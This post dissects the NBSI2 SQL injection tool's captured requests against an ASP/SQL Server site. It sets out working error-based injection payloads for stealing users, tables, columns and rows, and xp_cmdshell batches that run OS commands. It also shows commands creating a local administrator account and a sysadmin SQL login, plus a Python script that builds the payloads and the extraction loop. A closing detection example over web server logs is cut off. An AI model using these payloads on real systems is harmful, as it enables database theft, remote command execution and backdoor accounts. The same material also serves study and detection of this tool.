NBSI2 Internals Demystified (Database Tutorial)

Posted: 2023-01-10 07:50:47



Part 1: NBSI2 Internals Demystified

SQL injection was all the rage a while ago. Anyone who has used Xiaozhu's (小竹) NB2 knows that the tool is close to unbeatable: even a newbie can use it to own a site in seconds. But if you do not understand the injection process behind it, you will never improve.

Let me say up front that I am only a newbie myself. I happen to be studying SQL lately, so I took the opportunity to study NB2's injection process. The tool I used is WSE, which everyone will know; it can be downloaded all over the net, one address being www.gxgl.com/soft/WSE06b1.zip. It is a program for monitoring and modifying the data a program sends and receives over the network, useful for debugging network applications.

Enough talk, let's get to work. First find a random site with a SQL injection hole, www.testdb.net, and an injection point: www.testdb.net/article_read.asp?id=80

(The address www.testdb.net does not actually exist, of course.)

Step 1. Obtaining SQL Server database information

Open NB2, enter the address www.testdb.net/article_read.asp?id=80, select the "GET" method and click "Detect".

NB2 reports the following about the SQL Server database:

Multi-statement execution: unknown
Subqueries: supported
Current user: test
User privilege: DB_OWNER
Current database: testdb

Anyone who has used NB2 will be familiar with this output.

In the captured requests %20 decodes to a space, %2B to + and %25 to %. Two response codes matter:

HTTP/1.1 200 OK     // the injected condition evaluated without error
HTTP/1.1 500 Internal Server Error     // the query raised an error; the ASP error page carries the SQL Server message

NB2 works almost entirely by forcing a type-conversion error and reading the leaked value out of the 500 error page, so the 500 responses are where the information comes from.

The GET packets captured with WSE (the request headers are identical for every request and are shown only where the capture included them):

GET /article_read.asp?id=80 HTTP/1.1
// baseline request

GET /article_read.asp?id=80%20and%20user%2Bchar(124)=0 HTTP/1.1
i.e. article_read.asp?id=80 and user+char(124)=0
char(124) is the character '|'

GET /article_read.asp?id=80;declare%20@a%20int-- HTTP/1.1
i.e. article_read.asp?id=80;declare @a int--
// tests whether multiple statements (stacked queries) are supported

GET /article_read.asp?id=80%20and%20(Select%20count(1)%20from%20[sysobjects])>=0 HTTP/1.1
Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
User-Agent: Microsoft URL Control - 6.00.8862
Host: www.testdb.net
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: articleid=80%3Bdeclare+%40a+int%2D%2D; ASPSESSIONIDSSTCTTQD=ELLNNEIDCEEANBMOKAMGJGED

i.e. article_read.asp?id=80 and (Select count(1) from [sysobjects])>=0
// tests whether subqueries are supported

GET /article_read.asp?id=80%20And%20user%2Bchar(124)=0 HTTP/1.1
Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
User-Agent: Microsoft URL Control - 6.00.8862
Host: www.testdb.net
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: articleid=80+and+%28Select+count%281%29+from+%5Bsysobjects%5D%29%3E%3D0; ASPSESSIONIDSSTCTTQD=ELLNNEIDCEEANBMOKAMGJGED

i.e. article_read.asp?id=80 And user+char(124)=0
// retrieves the current user

Two details in these captures are worth noticing. The User-Agent "Microsoft URL Control - 6.00.8862" is the default agent string of the Internet Transfer Control shipped with Visual Basic 6, which NB2 is built on, so the tool is easy to pick out in web server logs. And the articleid cookie always carries the id value of the previous request, injected payload included, which tells us the application itself stores the parameter in a cookie.

user is a niladic system function in SQL Server that returns the name of the current database user, of type nvarchar. When an nvarchar value is compared with the integer 0, SQL Server first tries to convert the nvarchar value to int, and that conversion fails. The error message reads: Syntax error converting the nvarchar value 'east_asp' to a column of data type int. Here east_asp is exactly the value of user, so the database user name is obtained without any effort. The classic short form of this probe is simply and user>0; NB2 appends char(124), i.e. '|', so that the end of the leaked value is clearly marked inside the error message.

GET /article_read.asp?id=80%20And%20Cast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00)%20as%20varchar(1))%2Bchar(124)=1 HTTP/1.1
Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
User-Agent: Microsoft URL Control - 6.00.8862
Host: www.testdb.net
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: articleid=80+and+%28Select+count%281%29+from+%5Bsysobjects%5D%29%3E%3D0; ASPSESSIONIDSSTCTTQD=ELLNNEIDCEEANBMOKAMGJGED

i.e. article_read.asp?id=80 And Cast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))+char(124)=1

Function description:

IS_SRVROLEMEMBER indicates whether the current login is a member of the specified server role.

Syntax

IS_SRVROLEMEMBER ( 'role' [ , 'login' ] )

Arguments

'role': name of the server role to check; the data type of role is sysname. Valid values are sysadmin, dbcreator, diskadmin, processadmin, serveradmin, setupadmin, securityadmin and bulkadmin.

'login': optional name of the login to check; the data type of login is sysname and the default is NULL, meaning the login of the current connection.

It returns 1 if the login is a member of the role, 0 if it is not, and NULL if the role or login is invalid.

select Cast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))+char(124) therefore gives "1|" for a sysadmin login and "0|" for any other. Comparing that string with the integer 1 forces the same conversion error as before, so the 500 page reports either '1|' or '0|', and NB2 reads the answer out of the error text.

GET /article_read.asp?id=80%20And%20Cast(IS_MEMBER(0x640062005F006F0077006E0065007200)%20as%20varchar(1))%2Bchar(124)=1 HTTP/1.1
Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
User-Agent: Microsoft URL Control - 6.00.8862
Host: www.testdb.net
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: articleid=80+and+%28Select+count%281%29+from+%5Bsysobjects%5D%29%3E%3D0; ASPSESSIONIDSSTCTTQD=ELLNNEIDCEEANBMOKAMGJGED

i.e. article_read.asp?id=80 And Cast(IS_MEMBER(0x640062005F006F0077006E0065007200) as varchar(1))+char(124)=1

select Cast(IS_MEMBER(0x640062005F006F0077006E0065007200) as varchar(1))+char(124) likewise returns "1|", the same result as above, but note that the long hex string inside IS_MEMBER differs from the one inside IS_SRVROLEMEMBER. These strings are not arbitrary: they are the nchar encoding (UTF-16LE, two bytes per character with the low byte first) of the role names. 0x730079007300610064006D0069006E00 is s y s a d m i n, i.e. "sysadmin", and 0x640062005F006F0077006E0065007200 is d b _ o w n e r, i.e. "db_owner". Reading the bytes as 8-bit characters shows only every other character interleaved with NULs, which is why a naive decode looks like garbage. SQL Server implicitly converts the binary constant to the nvarchar argument, so NB2 can pass the role name without a single quote character, which a filtering page might escape or block. IS_MEMBER checks whether the current user is a member of the given database role (here db_owner) or Windows group, and this is how NB2 fills in "User privilege: DB_OWNER".

GET /article_read.asp?id=80%20And%20db_name()%2Bchar(124)=0 HTTP/1.1
Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
User-Agent: Microsoft URL Control - 6.00.8862
Host: www.testdb.net
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: articleid=80+and+%28Select+count%281%29+from+%5Bsysobjects%5D%29%3E%3D0; ASPSESSIONIDSSTCTTQD=ELLNNEIDCEEANBMOKAMGJGED

i.e. article_read.asp?id=80 And db_name()+char(124)=0

This one uses the db_name() function, which needs little explanation: db_name() is a system function that returns the name of the current database, and the same conversion-error trick leaks it, giving "Current database: testdb".

That completes the analysis of how the database information is obtained.

Note: the POST method is not analysed in detail; you can look at the captured POST packets yourselves. They are essentially the same as GET, with the payload in the last line of the request body.

NB2 also tries the same probe in several injection contexts, which is how it copes with string and LIKE parameters as well as numeric ones:

id=80%20and%20user%2Bchar(124)=0                              numeric context: id=80 and user+char(124)=0
id=80'%20and%20user%2Bchar(124)=0%20and%20''='               quoted string: id=80' and user+char(124)=0 and ''='
id=80%25'%20and%20user%2Bchar(124)=0%20and%20'%25'='         LIKE pattern: id=80%' and user+char(124)=0 and '%'='

and the true/false pairs used to confirm a boolean injection point (the page must differ between 1=1 and 1=2):

id=80%20And%201=1
id=80%20And%201=2
id=80'%20And%201=1%20And%20''='
id=80'%20And%201=2%20And%20''='
id=80%25'%20And%201=1%20And%20'%25'='
id=80%25'%20And%201=2%20And%20'%25'='

//////////////////////////////////////////////

Step 2. Guessing table names

Top 1

GET /article_read.asp?id=80%20And%20(Select%20Top%201%20cast(name%20as%20varchar(8000))%20from(Select%20Top%201%20id,name%20from%20[testdb]..[sysobjects]%20Where%20xtype=char(85)%20order%20by%20id)%20T%20order%20by%20id%20desc)>0 HTTP/1.1

i.e. article_read.asp?id=80 And (Select Top 1 cast(name as varchar(8000)) from(Select Top 1 id,name from [testdb]..[sysobjects] Where xtype=char(85) order by id) T order by id desc)>0

char(85) = 'U', so only user tables are considered. The inner query takes the first N user tables ordered by object id; the outer query reverses that order and keeps a single row, so the result is exactly the Nth table. Comparing its name (cast to varchar) with 0 triggers the conversion error that reveals it. Top 1 therefore yields the first table name of testdb, and Top N, by the same pattern, the Nth.

Top 2

GET /article_read.asp?id=80%20And%20(Select%20Top%201%20cast(name%20as%20varchar(8000))%20from(Select%20Top%202%20id,name%20from%20[testdb]..[sysobjects]%20Where%20xtype=char(85)%20order%20by%20id)%20T%20order%20by%20id%20desc)>0 HTTP/1.1

...

Top N

Packet captured by WSE:

GET /article_read.asp?id=80%20And%20(Select%20Top%201%20cast(name%20as%20varchar(8000))%20from(Select%20Top%201%20id,name%20from%20[testdb]..[sysobjects]%20Where%20xtype=char(85)%20order%20by%20id)%20T%20order%20by%20id%20desc)>0 HTTP/1.1
Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
User-Agent: Microsoft URL Control - 6.00.8862
Host: www.testdb.net
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDSSTCTTQD=ELLNNEIDCEEANBMOKAMGJGED; articleid=80+and+%28Select+count%281%29+from+%5Bsysobjects%5D%29%3E%3D0

...........

//////////////////////////////////////////////

Step 3. Guessing column names for a given table

Table name: article

Top 1

GET /article_read.asp?id=80%20And%20(Select%20Top%201%20cast(name%20as%20varchar(8000))%20from%20(Select%20Top%201%20colid,name%20From%20[testdb]..[syscolumns]%20Where%20id%20=%20OBJECT_ID(NCHAR(101)%2BNCHAR(97)%2BNCHAR(115)%2BNCHAR(116)%2BNCHAR(104)%2BNCHAR(111)%2BNCHAR(116)%2BNCHAR(46)%2BNCHAR(46)%2BNCHAR(65)%2BNCHAR(82)%2BNCHAR(84)%2BNCHAR(73)%2BNCHAR(67)%2BNCHAR(76)%2BNCHAR(69))%20Order%20by%20colid)%20T%20Order%20by%20colid%20desc)>0 HTTP/1.1

i.e. article_read.asp?id=80 And (Select Top 1 cast(name as varchar(8000)) from (Select Top 1 colid,name From [testdb]..[syscolumns] Where id = OBJECT_ID(NCHAR(101)+NCHAR(97)+NCHAR(115)+NCHAR(116)+NCHAR(104)+NCHAR(111)+NCHAR(116)+NCHAR(46)+NCHAR(46)+NCHAR(65)+NCHAR(82)+NCHAR(84)+NCHAR(73)+NCHAR(67)+NCHAR(76)+NCHAR(69)) Order by colid) T Order by colid desc)>0

This retrieves the name of the first column of the article table from syscolumns, using the same nested Top N / order by desc construction as for tables, now keyed on colid; Top N retrieves the Nth column.

Function description:

OBJECT_ID returns the database object identification number.

Syntax: OBJECT_ID ( 'object' )

Argument 'object': the object to look up. The data type of object is char or nchar; a char value is implicitly converted to nchar.

Return type: int

NCHAR(101)+NCHAR(97)+NCHAR(115)+NCHAR(116)+NCHAR(104)+NCHAR(111)+NCHAR(116)+NCHAR(46)+NCHAR(46)+NCHAR(65)+NCHAR(82)+NCHAR(84)+NCHAR(73)+NCHAR(67)+NCHAR(76)+NCHAR(69)

is a string built one character code at a time: e a s t h o t . . A R T I C L E, i.e. easthot..ARTICLE. (The capture was evidently taken against a database actually named easthot; the article substitutes the placeholder testdb for it elsewhere, which is also why the error message in step 1 showed the user east_asp rather than test.) NB2 spells the object name with NCHAR() for the same reason it passes role names as hex: the payload then contains no quote characters at all. With the placeholder name the call is OBJECT_ID('testdb..ARTICLE'), so the request amounts to:

article_read.asp?id=80 And (Select Top 1 cast(name as varchar(8000)) from (Select Top 1 colid,name From [testdb]..[syscolumns] Where id = OBJECT_ID('testdb..ARTICLE') Order by colid) T Order by colid desc)>0

Top 2

GET /article_read.asp?id=80%20And%20(Select%20Top%201%20cast(name%20as%20varchar(8000))%20from%20(Select%20Top%202%20colid,name%20From%20[testdb]..[syscolumns]%20Where%20id%20=%20OBJECT_ID(NCHAR(101)%2BNCHAR(97)%2BNCHAR(115)%2BNCHAR(116)%2BNCHAR(104)%2BNCHAR(111)%2BNCHAR(116)%2BNCHAR(46)%2BNCHAR(46)%2BNCHAR(65)%2BNCHAR(82)%2BNCHAR(84)%2BNCHAR(73)%2BNCHAR(67)%2BNCHAR(76)%2BNCHAR(69))%20Order%20by%20colid)%20T%20Order%20by%20colid%20desc)>0 HTTP/1.1

Top N

...

Packet captured by WSE:

GET /article_read.asp?id=80%20And%20(Select%20Top%201%20cast(name%20as%20varchar(8000))%20from%20(Select%20Top%201%20colid,name%20From%20[testdb]..[syscolumns]%20Where%20id%20=%20OBJECT_ID(NCHAR(101)%2BNCHAR(97)%2BNCHAR(115)%2BNCHAR(116)%2BNCHAR(104)%2BNCHAR(111)%2BNCHAR(116)%2BNCHAR(46)%2BNCHAR(46)%2BNCHAR(65)%2BNCHAR(82)%2BNCHAR(84)%2BNCHAR(73)%2BNCHAR(67)%2BNCHAR(76)%2BNCHAR(69))%20Order%20by%20colid)%20T%20Order%20by%20colid%20desc)>0 HTTP/1.1
Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
User-Agent: Microsoft URL Control - 6.00.8862
Host: www.testdb.net
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDSSTCTTQD=ELLNNEIDCEEANBMOKAMGJGED; articleid=80+and+%28Select+count%281%29+from+%5Bsysobjects%5D%29%3E%3D0

...............

//////////////////////////////////////////////

Step 4. Extracting field contents for a given column

Column name: Title

Top 1

GET /article_read.asp?id=80%20And%20(Select%20Top%201%20isNull(cast([TITLE]%20as%20varchar(8000)),char(32))%2Bchar(124)%20From%20(Select%20Top%201%20[TITLE]%20From%20[testdb]..[ARTICLE]%20Where%201=1%20Order%20by%20[TITLE])%20T%20Order%20by%20[TITLE]%20desc)>0 HTTP/1.1

i.e. article_read.asp?id=80 And (Select Top 1 isNull(cast([TITLE] as varchar(8000)),char(32))+char(124) From (Select Top 1 [TITLE] From [testdb]..[ARTICLE] Where 1=1 Order by [TITLE]) T Order by [TITLE] desc)>0

This retrieves the value of the TITLE column in the first row, and Top N the value in the Nth row. Note that the rows are ordered by the column being read, so they come back in TITLE order rather than insertion order. isNull(cast([TITLE] as varchar(8000)),char(32)) replaces a NULL title by a space: without it the concatenation with '|' would itself be NULL, the comparison would be unknown rather than an error, and the server would answer 200 with nothing to read.

Top 2

GET /article_read.asp?id=80%20And%20(Select%20Top%201%20isNull(cast([TITLE]%20as%20varchar(8000)),char(32))%2Bchar(124)%20From%20(Select%20Top%202%20[TITLE]%20From%20[testdb]..[ARTICLE]%20Where%201=1%20Order%20by%20[TITLE])%20T%20Order%20by%20[TITLE]%20desc)>0 HTTP/1.1

Top N

...

Packets captured by WSE:

// get the number of rows in the article table, so NB2 knows how many Top N requests to send

GET /article_read.asp?id=80%20And%20(Select%20Cast(Count(1)%20as%20varchar(8000))%2Bchar(124)%20From%20[testdb]..[ARTICLE]%20Where%201=1)>0 HTTP/1.1
Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
User-Agent: Microsoft URL Control - 6.00.8862
Host: www.testdb.net
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDSSTCTTQD=ELLNNEIDCEEANBMOKAMGJGED; articleid=80+and+%28Select+count%281%29+from+%5Bsysobjects%5D%29%3E%3D0

// get the first record of the Title column of the Article table

GET /article_read.asp?id=80%20And%20(Select%20Top%201%20isNull(cast([TITLE]%20as%20varchar(8000)),char(32))%2Bchar(124)%20From%20(Select%20Top%201%20[TITLE]%20From%20[testdb]..[ARTICLE]%20Where%201=1%20Order%20by%20[TITLE])%20T%20Order%20by%20[TITLE]%20desc)>0 HTTP/1.1
Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
User-Agent: Microsoft URL Control - 6.00.8862
Host: www.testdb.net
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDSSTCTTQD=ELLNNEIDCEEANBMOKAMGJGED; articleid=80+and+%28Select+count%281%29+from+%5Bsysobjects%5D%29%3E%3D0

...............
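The encodings and the extraction loop seen in steps 1 to 4 (the hex role names, the NCHAR() object name, the nested Top N queries and the value read back from the conversion error) can be reproduced offline. The following is an added example, not code from the original article or from NBSI2 itself; all function names are this example's own, and the sample 500 page body is constructed here rather than captured.

```python
"""Added example, not code from the original article or from NBSI2 itself:
reconstructs the encodings and the error-based extraction loop visible in
the captured requests of steps 1 to 4. Function names are this example's own;
SAMPLE_500_BODY is constructed, not a real capture."""
import re
from urllib.parse import quote


def nchar_hex(s):
    """Hex literal of an nvarchar string (UTF-16LE), the form NB2 uses for
    the role names inside IS_SRVROLEMEMBER() / IS_MEMBER(); SQL Server
    converts the binary constant implicitly, so no quotes are needed."""
    return "0x" + s.encode("utf-16-le").hex().upper()


def nchar_concat(s):
    """NCHAR(n)+NCHAR(n)+... form used inside OBJECT_ID(), also quote-free."""
    return "+".join("NCHAR(%d)" % ord(c) for c in s)


def table_name_payload(db, n):
    """Condition that leaks the Nth user table (xtype 'U' = char(85)): the
    inner query takes the first N tables by object id, the outer one
    reverses the order and keeps a single row."""
    return ("(Select Top 1 cast(name as varchar(8000)) from(Select Top %d id,name "
            "from [%s]..[sysobjects] Where xtype=char(85) order by id) T "
            "order by id desc)>0" % (n, db))


def column_name_payload(db, table, n):
    """Condition that leaks the Nth column of db..table via syscolumns."""
    return ("(Select Top 1 cast(name as varchar(8000)) from (Select Top %d colid,name "
            "From [%s]..[syscolumns] Where id = OBJECT_ID(%s) Order by colid) T "
            "Order by colid desc)>0" % (n, db, nchar_concat("%s..%s" % (db, table))))


def row_value_payload(db, table, col, n):
    """Condition that leaks the Nth value of a column, in that column's
    order; NULL becomes a space and '|' marks the end of the value."""
    return ("(Select Top 1 isNull(cast([%s] as varchar(8000)),char(32))+char(124) "
            "From (Select Top %d [%s] From [%s]..[%s] Where 1=1 Order by [%s]) T "
            "Order by [%s] desc)>0" % (col, n, col, db, table, col, col))


def build_request(base_id, condition):
    """Request line as WSE shows it: spaces become %20 and '+' becomes %2B,
    while (), [], comma, '=' and '>' stay literal."""
    return "GET /article_read.asp?id=%s HTTP/1.1" % quote(
        "%d And %s" % (base_id, condition), safe="()[]=,>")


# Message 245 of SQL Server 2000 (what NB2 targeted) and the later wording.
_CONVERSION_ERRORS = (
    re.compile(r"converting the n?varchar value '(.*?)' to a column of data type int"),
    re.compile(r"converting the n?varchar value '(.*?)' to data type int"),
)


def value_from_error(body):
    """Value SQL Server failed to convert, taken from a 500 error page."""
    for rx in _CONVERSION_ERRORS:
        m = rx.search(body)
        if m:
            return m.group(1)
    return None


def enumerate_values(make_payload, send, count=None, base_id=80):
    """NB2's loop: request Top 1, Top 2, ... and read each value out of the
    conversion error. send(request_line) returns (status, body). When the
    count is unknown we stop once TOP N starts repeating the last row; NB2
    itself asks for Count(1) first, so duplicate rows are not mistaken for the end."""
    found = []
    for n in range(1, (count or 200) + 1):
        status, body = send(build_request(base_id, make_payload(n)))
        value = value_from_error(body) if status == 500 else None
        if value is None:
            break
        value = value[:-1] if value.endswith("|") else value
        if count is None and found and value == found[-1]:
            break
        found.append(value)
    return found


# Constructed sample of an ASP/OLE DB 500 page, not a real capture.
SAMPLE_500_BODY = (
    "Microsoft OLE DB Provider for ODBC Drivers error '80040e07'\r\n"
    "[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting "
    "the nvarchar value 'east_asp' to a column of data type int.\r\n"
    "/article_read.asp, line 12"
)

if __name__ == "__main__":
    print(nchar_hex("sysadmin"))
    print(build_request(80, table_name_payload("testdb", 1)))
    print(value_from_error(SAMPLE_500_BODY))
```

Running the file prints the sysadmin hex literal, the Top 1 table-name request exactly as it appears in the capture above, and the user name recovered from the sample error page. To drive it against a real target you would supply a send() that performs the HTTP request and returns the status and body; the example deliberately contains no network code.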

//////////////////////////////////////////////

That covers the analysis of table names, column names and field contents. Now for the other main functions.

Step 5. Executing DOS commands and SQL statements

Executing the DOS command dir c:\

////////////////////////////////////////////////

Packet analysis, echo mode (output displayed):

GET /article_read.asp?id=80%20And%20db_name()%2Bchar(124)=0 HTTP/1.1
Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
User-Agent: Microsoft URL Control - 6.00.8862
Host: www.testdb.net
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDSSTCTTQD=ELLNNEIDCEEANBMOKAMGJGED; articleid=80+and+%28Select+count%281%29+from+%5Bsysobjects%5D%29%3E%3D0

GET /article_read.asp?id=80;EXEC%20MASTER..XP_CMDSHELL%20'Dir%20C:\%20>%20C:\NB_Commander_Txt.log';DROP%20TABLE%20NB_Commander_Tmp;CREATE%20TABLE%20NB_Commander_Tmp(ResultTxt%20varchar(7996)%20NULL);BULK%20INSERT%20[testdb]..[NB_Commander_Tmp]%20FROM%20'C:\NB_Commander_Txt.log'%20WITH%20(KEEPNULLS);Alter%20Table%20NB_Commander_Tmp%20add%20ID%20int%20NOT%20NULL%20IDENTITY%20(1,1)-- HTTP/1.1
Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
User-Agent: Microsoft URL Control - 6.00.8862
Host: www.testdb.net
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDSSTCTTQD=ELLNNEIDCEEANBMOKAMGJGED; articleid=80+and+%28Select+count%281%29+from+%5Bsysobjects%5D%29%3E%3D0

The important part is this:

article_read.asp?id=80;EXEC MASTER..XP_CMDSHELL 'Dir C:\ >C:\NB_Commander_Txt.log';
DROP TABLE NB_Commander_Tmp;CREATE TABLE NB_Commander_Tmp(ResultTxt varchar(7996) NULL);
BULK INSERT [testdb]..[NB_Commander_Tmp] FROM 'C:\NB_Commander_Txt.log' WITH (KEEPNULLS);
Alter Table NB_Commander_Tmp add ID int NOT NULL IDENTITY (1,1)--

BULK INSERT copies a data file into a database table or view in a user-specified format.

KEEPNULLS specifies that empty columns keep a null value during the bulk copy instead of receiving the column's default value.

See the T-SQL reference for the full details.

What the statement does is run the DOS command Dir c:\ with its output redirected to the file NB_Commander_Txt.log, load that file line by line into the freshly created temporary table NB_Commander_Tmp, and add an auto-incrementing ID column so that each line can be read back by number. The DROP TABLE first clears any leftover table from a previous run; if it does not exist that statement fails but the rest of the batch still runs. The whole thing needs sysadmin rights: xp_cmdshell is restricted to sysadmin, BULK INSERT requires bulkadmin or sysadmin, and the file is read by the SQL Server service account, not by the web user. It also requires the stacked-query support probed in step 1, since several statements are sent as one batch.

ID=1

GET /article_read.asp?id=80%20And%20(Select%20Top%201%20CASE%20WHEN%20ResultTxt%20is%20Null%20then%20'|'%20else%20ResultTxt%2B'|'%20End%20From%20NB_Commander_Tmp%20Where%20ID=1)=0 HTTP/1.1
Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
User-Agent: Microsoft URL Control - 6.00.8862
Host: www.testdb.net
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDSSTCTTQD=ELLNNEIDCEEANBMOKAMGJGED; articleid=80%3BEXEC+MASTER%2E%2EXP%5FCMDSHELL+%27Dir+C%3A%5C+%3E+C%3A%5CNB%5FCommander%5FTxt%2Elog%27%3BDROP+TABLE+NB%5FCommander%5FTmp%3BCREATE+TABLE+NB%5FCommander%5FTmp%28ResultTxt+varchar%287996%29+NULL%29%3BBULK+INSERT+%5Btestdb%5D%2E%2E%5BNB%5FCommander%5FTmp%5D+FROM+%27C%3A%5CNB%5FCommander%5FTxt%2Elog%27+WITH+%28KEEPNULLS%29%3BAlter+Table+NB%5FCommander%5FTmp+add+ID+int+NOT+NULL+IDENTITY+%281%2C1%29%2D%2D

i.e. article_read.asp?id=80 And (Select Top 1 CASE WHEN ResultTxt is Null then '|' else ResultTxt+'|' End From NB_Commander_Tmp Where ID=1)=0

This outputs the first line of the command's output, again by forcing a conversion error on the string; the CASE expression turns an empty line into a lone '|' instead of NULL. The same request with ID=2, ID=3 and so on, up to ID=N, outputs the remaining lines.

ID=2

GET /article_read.asp?id=80%20And%20(Select%20Top%201%20CASE%20WHEN%20ResultTxt%20is%20Null%20then%20'|'%20else%20ResultTxt%2B'|'%20End%20From%20NB_Commander_Tmp%20Where%20ID=2)=0 HTTP/1.1
Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
User-Agent: Microsoft URL Control - 6.00.8862
Host: www.testdb.net
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDSSTCTTQD=ELLNNEIDCEEANBMOKAMGJGED; articleid=80%3BEXEC+MASTER%2E%2EXP%5FCMDSHELL+%27Dir+C%3A%5C+%3E+C%3A%5CNB%5FCommander%5FTxt%2Elog%27%3BDROP+TABLE+NB%5FCommander%5FTmp%3BCREATE+TABLE+NB%5FCommander%5FTmp%28ResultTxt+varchar%287996%29+NULL%29%3BBULK+INSERT+%5Btestdb%5D%2E%2E%5BNB%5FCommander%5FTmp%5D+FROM+%27C%3A%5CNB%5FCommander%5FTxt%2Elog%27+WITH+%28KEEPNULLS%29%3BAlter+Table+NB%5FCommander%5FTmp+add+ID+int+NOT+NULL+IDENTITY+%281%2C1%29%2D%2D

ID=N

...............

Output displayed:

[Unexpected output]
[Unexpected output]
[Unexpected output]
[Unexpected output]
[Unexpected output]
[Unexpected output]
[Unexpected output]
[Unexpected output]
[Unexpected output]
[Unexpected output]
...

If everything works, every file under C:\ is listed. When the prompt above appears instead, the likely cause is that the table NB_Commander_Tmp was never created, so there is nothing to read back; that is exactly what happens when the web application's login is only db_owner, as found in step 1, since then xp_cmdshell and BULK INSERT are refused.

////////////////////////////////////////////////

Packet analysis, no-echo mode:

DOS command Dir C:\

GET /article_read.asp?id=80;EXEC%20MASTER..XP_CMDSHELL%20'Dir%20C:\'-- HTTP/1.1
Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
User-Agent: Microsoft URL Control - 6.00.8862
Host: www.testdb.net
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDSSTCTTQD=ELLNNEIDCEEANBMOKAMGJGED; articleid=80%3BDROP+TABLE+NB%5FCommander%5FTmp%3BEXEC+MASTER%2E%2EXP%5FCMDSHELL+%27DEL+C%3A%5CNB%5FCommander%5FTxt%2Elog%27%2D%2D

i.e. article_read.asp?id=80;EXEC MASTER..XP_CMDSHELL 'Dir C:\'--

No output is needed, so the command is simply executed. The cookie is interesting here: it holds the previous request, which shows how NB2 cleans up after echo mode:

id=80;DROP TABLE NB_Commander_Tmp;EXEC MASTER..XP_CMDSHELL 'DEL C:\NB_Commander_Txt.log'--

Output displayed:

Command completed

DOS command:

net user TsInternetUsers Password /add

GET /article_read.asp?id=80;EXEC%20MASTER..XP_CMDSHELL%20'net%20user%20TsInternetUsers%20Password%20/add'-- HTTP/1.1
Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
User-Agent: Microsoft URL Control - 6.00.8862
Host: www.testdb.net
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDSSTCTTQD=ELLNNEIDCEEANBMOKAMGJGED; articleid=80%3BEXEC+MASTER%2E%2EXP%5FCMDSHELL+%27Dir+C%3A%5C%27%2D%2D

Other DOS commands are executed the same way:

id=80;EXEC MASTER..XP_CMDSHELL 'net user TsInternetUsers /add'--
id=80;EXEC MASTER..XP_CMDSHELL 'net localgroup administrators TsInternetUsers /add'--

These run under the SQL Server service account, so creating a local user and adding it to Administrators only succeeds if that account has the right to do so (as LocalSystem does).

Executing SQL statements (same mechanism as DOS commands):

GET /article_read.asp?id=80;exec%20master..sp_addlogin%20UserName,Password-- HTTP/1.1
Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
User-Agent: Microsoft URL Control - 6.00.8862
Host: www.testdb.net
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDSSTCTTQD=ELLNNEIDCEEANBMOKAMGJGED; articleid=80%3BEXEC+MASTER%2E%2EXP%5FCMDSHELL+%27net+user+TsInternetUsers+Password+%2Fadd%27%2D%2D

id=80;exec master..sp_addlogin UserName,Password--
id=80;exec master..sp_addsrvrolemember UserName,sysadmin--

sp_addlogin creates a new SQL Server login and sp_addsrvrolemember adds it to a fixed server role, here sysadmin; adding a member to sysadmin requires sysadmin rights on the injected connection.

....
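Everything NB2 sends in steps 1 to 5 is visible in the web server log: the conversion-error probes, the stacked ;EXEC batches, the hex and NCHAR() encodings, and the fixed User-Agent string. The following is an added example, not code from the original article, showing detection logic run over constructed IIS W3C log lines. The field layout assumed (date time c-ip cs-method cs-uri-stem cs-uri-query sc-status cs(User-Agent)) is a choice for this example; IIS writes spaces inside a logged field as '+', which is why the User-Agent appears the way it does. The sample lines reuse the requests analysed above and are constructed, not captured.

```python
"""Added example, not code from the original article: detection logic for
the NB2 request patterns shown in the captures above, run over constructed
IIS W3C log lines. Assumed field layout (a choice for this example): date
time c-ip cs-method cs-uri-stem cs-uri-query sc-status cs(User-Agent)."""
import re
from collections import defaultdict
from urllib.parse import unquote

# Constructed sample log, not a real capture: the queries are the NB2
# requests analysed above, plus two ordinary visits for contrast.
SAMPLE_LOG = """\
2003-11-26 22:30:01 10.0.0.5 GET /article_read.asp id=80 200 Mozilla/4.0+(compatible;+MSIE+6.0)
2003-11-26 22:30:02 10.0.0.5 GET /article_read.asp id=80%20and%20user%2Bchar(124)=0 500 Microsoft+URL+Control+-+6.00.8862
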